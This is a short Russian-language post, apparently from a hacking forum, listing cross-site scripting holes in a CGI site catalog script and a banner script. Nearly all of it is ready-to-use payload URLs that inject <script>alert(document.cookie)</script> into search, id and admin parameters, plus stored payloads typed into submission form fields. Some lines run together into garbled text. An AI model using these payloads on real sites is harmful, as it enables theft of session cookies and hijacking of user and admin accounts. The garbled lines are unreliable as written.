XSS:
Активка:
На странице http://site/catalog/add-lnk.cgi?cmd=showform пишем
В полях: Название ресурса, URL, Регион, Описание сайта.
Код:
http://site/catalog/index.cgi?search=%3Cscript%3Ealert(document.cookie)%3C/script%3E&sparam=all&category=cat20
Код:
http://site/catalog/add-lnk.cgi?cmd=sendpassword&id=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
Код:
http://site/catalog/add-lnk.cgi?cmd=edit&id=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
Код:
http://site/catalog/admin.cgi?cmd=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3EАктивка:
На странице http://site/catalog/add-lnk.cgi?cmd=showform пишем
Код:
<BODY onload=alert(document.cookie)RotaBanner
XSS:
Код:
http://site/account/index.html?user=%3Cscript%3Ealert(document.cookie)%3C/script%3E
Код:
http://site/account/index.html?drop=%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E